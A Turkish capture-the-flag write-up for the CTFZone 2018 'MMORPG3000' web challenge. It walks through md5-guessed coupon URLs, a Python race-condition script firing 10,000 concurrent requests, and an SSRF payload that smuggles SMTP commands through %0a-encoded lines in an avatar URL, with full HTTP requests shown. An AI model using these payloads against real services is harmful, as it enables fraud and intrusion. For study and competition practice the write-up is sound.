<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>MMORPG3000 - CTFZone 2018 | anal.school</title><meta name="description" content="bir çeşit ilim evi"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="MMORPG3000 - CTFZone 2018 | anal.school"><meta name="twitter:description" content="bir çeşit ilim evi"><meta name="twitter:image" content="https://anal.school/img/twit-banner.webp"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-118381182-2"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-118381182-2');</script><link rel="stylesheet" href="/css/arknights.css"><link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/styles/atom-one-dark-reasonable.min.css"><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
 font-display: swap;
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
 font-display: swap;
}</style><meta name="generator" content="Hexo 5.2.0"></head><body><header><nav><a href="/">Home</a><a href="/archives/">Archives</a><a href="/about/">About</a></nav></header><main><article><div id="post-bg"><div id="post-title"><div id="post-info"><span>date:<time datetime="2018-07-23T15:34:10.000Z" id="date"> 2018-07-23</time></span></div><h1>MMORPG3000 - CTFZone 2018</h1><hr></div><div id="post-content"><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">Here is a new generation mmorpg game, where you can beat your friends, just finished crowdfunding campaign and available on your PC starting today. It&#39;s a bit buggy, but you know...<br>I heard that developers of this game are really greedy.<br><br>http:&#x2F;&#x2F;web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one&#x2F;game&#x2F;battle&#x2F;competitors&#x2F;<br></code></pre></td></tr></table></figure>

<p>Verilen linke tikladigimizda assagidaki sayfa goruluyor.</p>
<p><img src="1.png"><br>Sunulan bedava kuponu almak uzere donate sayfasini gittik.</p>
<p><img src="2.png"></p>
<p>Verilen hediye kuponu girdikten sonra assagidaki resim ile karsilastik.</p>
<p><img src="3.png"></p>
<p>Resimin <strong>URL</strong>‘si şu şekilde;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">http:&#x2F;&#x2F;web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one&#x2F;storage&#x2F;img&#x2F;coupon_aa2a77371374094fe9e0bc1de3f94ed9.png<br></code></pre></td></tr></table></figure>

<p>__coupon_aa2a77371374094fe9e0bc1de3f94ed9__ urlin suffixi userid’in md5li hali oldugunu farkettik ve baska bir sayinin md5’ini alip denedik.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">http:&#x2F;&#x2F;web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one&#x2F;storage&#x2F;img&#x2F;coupon_6a81681a7af700c6385d36577ebec359.png<br></code></pre></td></tr></table></figure>

<p><img src="4.png"></p>
<p>Kuponlar ile level atlattik fakat level 30’un otesine kuponlar ile gecilmiyormus. Bir umit <strong>Race Condition</strong> vardir diye umit ettik ve denedik.</p>
<p><img src="5.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> asyncio<br><span class="hljs-keyword">from</span> aiohttp <span class="hljs-keyword">import</span> ClientSession<br><br><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fetch</span>(<span class="hljs-params">url, session</span>):</span><br>    <span class="hljs-keyword">async</span> <span class="hljs-keyword">with</span> session.get(url) <span class="hljs-keyword">as</span> response:<br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">await</span> response.read()<br><br><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span>(<span class="hljs-params">n</span>):</span><br>    sem = asyncio.Semaphore(n)<br>    <span class="hljs-keyword">async</span> <span class="hljs-keyword">with</span> ClientSession(cookies=&#123;<span class="hljs-string">&quot;session&quot;</span>: <span class="hljs-string">&quot;eyJ1aWQiOjgyOX0.DjeKvA.qA-vNIHjDFSPyuDwArZyGMQD984&quot;</span>&#125;) <span class="hljs-keyword">as</span> session:<br>        <span class="hljs-keyword">await</span> asyncio.gather(*(asyncio.ensure_future(fetch(<span class="hljs-string">&quot;http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one:80/donate/lvlup&quot;</span>, session)) <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(n)))<br><br>number = <span class="hljs-number">10000</span><br>loop = asyncio.get_event_loop()<br><br>future = asyncio.ensure_future(run(number))<br>loop.run_until_complete(future)<br></code></pre></td></tr></table></figure>

<p>Ve 30’uncu leveli geçtik</p>
<p><img src="6.png"></p>
<p>30’uncu leveli gectigimizden dolayı <strong>Avatar</strong> ekleme ozelligi aktif olmus oldu.</p>
<p><img src="7.png"></p>
<p>Upload fonksiyonunda bir sey yoktu. Belki  <strong>SSRF</strong>‘tir. <strong>127.0.0.1</strong> ve <strong>localhost</strong> engelliydi bu yüzden <strong>SSRF</strong> olgundan emin olduk. Ama <strong>0.0.0.0</strong> adresi calisiyordu. Port taramaya basladik.</p>
<p><img src="8.png"></p>
<p><strong>25</strong>‘ci port yani <strong>SMTP</strong> portu acikmis. <strong>Host</strong>‘u manipüle ederek <strong>SMTP</strong>‘yi kullanmayı denedik.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs smtp">Host: [0.0.0.0<br>helo 1v3m<br>mail from:&lt;qaewjlfnwej@o3enzyme.com&gt;<br>rcpt to:&lt;root&gt;<br>data<br>subject: give me flag<br><br>1v3m<br>.<br>]:25<br></code></pre></td></tr></table></figure>

<p>Yeni satır ayıracı <strong>SMTP</strong>‘de delimiter olduğu için her satırın sonuna yeni satırın <strong>URL Encoded</strong> hali olan <strong>%0A</strong>‘yı ekledik ve son payloadımızın son hali </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">[0.0.0.0%0ahelo 1v3m%0amail from:&lt;qaewjlfnwej@o3enzyme.com&gt;%0arcpt to:&lt;root&gt;%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25<br></code></pre></td></tr></table></figure>

<p><strong>Request</strong>‘imizin son hali şöyle oldu:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/user/avatar</span> HTTP/1.1<br><span class="hljs-attribute">Host</span>: web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one<br><span class="hljs-attribute">User-Agent</span>: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0<br><span class="hljs-attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span>: en-GB,en;q=0.5<br><span class="hljs-attribute">Accept-Encoding</span>: gzip, deflate<br><span class="hljs-attribute">Referer</span>: http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/avatar<br><span class="hljs-attribute">Content-Type</span>: multipart/form-data; boundary=---------------------------4693211868403427471435307016<br><span class="hljs-attribute">Content-Length</span>: 581<br><span class="hljs-attribute">Cookie</span>: session=eyJ1aWQiOjgyN30.DjaSgA.ylhJXkstamQ7GahYWvUypKpvDQc<br><span class="hljs-attribute">DNT</span>: 1<br><span class="hljs-attribute">Connection</span>: close<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span>: 1<br><br>-----------------------------4693211868403427471435307016<br><span class="hljs-attribute">Content-Disposition</span>: form-data; name=&quot;avatar&quot;; filename=&quot;&quot;<br><span class="hljs-attribute">Content-Type</span>: application/octet-stream<br><br><br>-----------------------------4693211868403427471435307016<br><span class="hljs-attribute">Content-Disposition</span>: form-data; name=&quot;url&quot;<br><br>https://[0.0.0.0%0ahelo 1v3m%0amail from:&lt;qaewjlfnwej@o3enzyme.com&gt;%0arcpt to:&lt;root&gt;%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25<br>-----------------------------4693211868403427471435307016<br><span class="hljs-attribute">Content-Disposition</span>: form-data; name=&quot;action&quot;<br><br><span class="hljs-attribute">save</span><br><span class="hljs-attribute">-----------------------------4693211868403427471435307016--</span><br><span class="hljs-attribute"></span><br></code></pre></td></tr></table></figure>
<p>Flag mailimize geldi</p>
<p><img src="9.png"></p>
<p>ve flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ctfzone&#123;1640392aaf27597150c97e04a99a6f08&#125;<br></code></pre></td></tr></table></figure><div id="paginator"></div></div><div id="post-footer"><hr><a href="/2019/01/20/Insomni%E2%80%99hack-2019-%E2%80%93-PHuck2/">← Prev Phuck2 – Insomni’hack 2019</a><span style="color: #fe2"> | </span><a href="/2018/07/23/Piggy-Bank-CTFZone-2018/">Piggy-Bank - CTFZone 2018 Next →</a><hr></div><div id="bottom-btn"><a id="to-top" href="#post-title" title="to top">∧</a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="/img/logo.webp" alt="Logo"></a><h1 id="Dr"><a href="/">~nya</a></h1></div><div id="aside-block"></div><footer><nobr>published with&nbsp;<a target="_blank" rel="noopener" href="http://hexo.io">Hexo&nbsp;</a></nobr><wbr><nobr>Theme&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknight&nbsp;</a></nobr><wbr><nobr>by&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><script src="/js/arknights.js"></script><script src="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/highlight.min.js"></script></body></html>